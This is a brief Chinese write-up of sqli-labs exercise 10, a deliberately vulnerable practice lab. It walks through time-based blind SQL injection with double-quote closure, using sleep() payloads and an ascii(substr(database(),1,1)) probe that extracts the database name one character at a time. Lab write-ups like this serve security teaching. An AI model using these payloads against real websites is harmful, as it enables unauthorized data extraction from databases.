sqli-labs练习(十)--- GET-Blind-Time based-double quotes

payload:id=1
sqli-labs练习(十)--- GET-Blind-Time based-double quotes

通过几次尝试,可以发现,这是一个基于时间的盲注,
payload:id=1' and sleep(5)%23,时间并没有延迟5秒,说明不是单引号的闭合
sqli-labs练习(十)--- GET-Blind-Time based-double quotes

payload:id=1" and sleep(5)%23,页面发生延迟,说明是双引号的闭合
sqli-labs练习(十)--- GET-Blind-Time based-double quotes

payload:id=1" and if(ascii(substr(database(),1,1))=115,sleep(5),null)%23,(tip:小写字母s的ascii码值是115)页面发生延迟
sqli-labs练习(十)--- GET-Blind-Time based-double quotes

相关文章:

  • 2021-04-20
  • 2021-09-15
  • 2021-10-23
  • 2021-09-15
  • 2021-07-02
  • 2021-10-23
  • 2022-12-23
  • 2021-09-17
猜你喜欢
  • 2021-11-25
  • 2021-12-23
  • 2021-10-12
  • 2022-01-22
  • 2021-06-08
  • 2021-07-10
  • 2021-10-09
相关资源
相似解决方案